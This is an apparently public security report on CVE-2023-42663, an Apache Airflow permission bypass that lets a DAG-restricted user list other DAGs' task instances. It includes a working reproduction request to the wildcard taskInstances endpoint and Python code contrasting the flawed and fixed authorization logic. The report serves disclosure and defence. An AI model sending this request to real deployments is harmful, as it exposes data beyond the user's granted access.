CVE-2023-42663: Apache Airflow: Bypass permission verification to view task instances of other dags
Low
## Vulnerability Details
Apache Airflow, versions before 2.7.2, has a vulnerability that allows an authorized user who has access to read specific DAGs only, to read information about task instances in other DAGs.
## Steps to reproduce
1. Copy the User role, name it roleA, and remove the "can read on DAGs", "can delete on DAGs" and "can edit on DAGs" permissions. Add the "can read on DAG:tutorial" permission.
2. Create a user named test and assign roleA to it.
3. Log in to the test account: only the DAG named tutorial is visible, and task instances of other DAGs cannot be seen either.
4. Use Burp Suite to send the following request (with the session cookie replaced by the test account's session); the response lists the task instances of other DAGs.
```
POST /api/v1/dags/~/dagRuns/~/taskInstances/list HTTP/1.1
Host: testvul.com:8080
Accept: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
content-type: application/json
Referer: http://testvul.com:8080/dags/example_external_task_marker_parent/grid
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=3d17f3fe-e02b-4f16-88f1-fd59e299ae0c.a4kyHK7of13T0NtbCVVmPgFtSDU
Connection: close
Content-Length: 2

{}
```
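The root cause in the steps above is that the batch endpoint resolves the `~` wildcard to every DAG in the metadata database without intersecting that set with the DAGs the caller is allowed to read. The following is an added illustration of the missing authorization step; it is not Airflow's own code and not the reporter's, and the `TaskInstance` records, the role permission sets and the helper names (`permitted_dag_ids`, `list_task_instances_unscoped`, `list_task_instances_scoped`) are constructed for this example. The permission strings mimic Airflow's resource naming ("DAGs" for the global resource, "DAG:<dag_id>" for a single DAG) so that the roleA configuration from step 1 can be modelled directly.

```python
"""Added example: per-user scoping of a wildcard ("~") task-instance listing.

Shows the flawed shape (wildcard returns everything) next to the corrected
shape (wildcard resolves to the caller's readable DAGs), using constructed
data rather than Airflow's real models or API layer.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class TaskInstance:
    """Constructed stand-in for a row of the task_instance table."""
    dag_id: str
    task_id: str
    run_id: str
    state: str


# Constructed sample: task instances belonging to three different DAGs.
TASK_INSTANCES = [
    TaskInstance("tutorial", "print_date", "manual__1", "success"),
    TaskInstance("tutorial", "sleep", "manual__1", "success"),
    TaskInstance("example_external_task_marker_parent", "parent_task", "scheduled__1", "running"),
    TaskInstance("example_bash_operator", "runme_0", "scheduled__1", "failed"),
]

# Constructed sample roles as (action, resource) pairs.
# ROLE_A mirrors step 1 of the report: no global DAG read, only DAG:tutorial.
ROLE_A = {
    ("can_read", "DAG:tutorial"),
    ("can_read", "Website"),
    ("can_read", "Task Instances"),
}
# ADMIN holds the global "can read on DAGs" permission.
ADMIN = {("can_read", "DAGs"), ("can_read", "Task Instances")}


def permitted_dag_ids(permissions, all_dag_ids):
    """Return the set of DAG ids a role may read.

    A global 'can_read' on 'DAGs' grants every DAG id; otherwise only the DAGs
    named by 'can_read' on 'DAG:<id>' permissions are readable.
    """
    if ("can_read", "DAGs") in permissions:
        return set(all_dag_ids)
    return {
        resource.split(":", 1)[1]
        for action, resource in permissions
        if action == "can_read" and resource.startswith("DAG:")
    }


def list_task_instances_unscoped(dag_id, task_instances):
    """Flawed shape: '~' means 'all DAGs' with no per-caller restriction,
    so a caller who may read only one DAG still receives every row."""
    if dag_id == "~":
        return list(task_instances)
    return [ti for ti in task_instances if ti.dag_id == dag_id]


def list_task_instances_scoped(dag_id, permissions, task_instances):
    """Corrected shape: resolve '~' to the caller's readable DAGs, and refuse
    an explicit dag_id the caller may not read instead of returning it."""
    all_ids = {ti.dag_id for ti in task_instances}
    readable = permitted_dag_ids(permissions, all_ids)
    if dag_id == "~":
        wanted = readable
    elif dag_id in readable:
        wanted = {dag_id}
    else:
        raise PermissionError(f"not permitted to read DAG {dag_id!r}")
    return [ti for ti in task_instances if ti.dag_id in wanted]


if __name__ == "__main__":
    leaked = list_task_instances_unscoped("~", TASK_INSTANCES)
    print("unscoped '~' returns DAGs:", sorted({ti.dag_id for ti in leaked}))
    kept = list_task_instances_scoped("~", ROLE_A, TASK_INSTANCES)
    print("scoped '~' for roleA returns DAGs:", sorted({ti.dag_id for ti in kept}))
```

The design point is that the wildcard must never be expanded against the whole table and only then filtered by the query parameters; it has to be expanded against the set of DAGs the authenticated user can read, and an explicit `dag_id` outside that set should be rejected rather than silently served. When verifying a deployment after upgrading to 2.7.2 or later, the same step-4 request issued with a restricted role's session should return only task instances from that role's readable DAGs.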
**Security Advisory**: https://lists.apache.org/thread/xj86cvfkxgd0cyqfmz6mh1bsfc61c6o9
**Severity**: Low
**Credit**: balis0ng
## Impact
It allows an authorized user who has access to read specific DAGs only, to read information about task instances in other DAGs.
## Report Stats
- Report ID: 2208656
- State: Closed
- Substate: resolved
- Upvotes: 49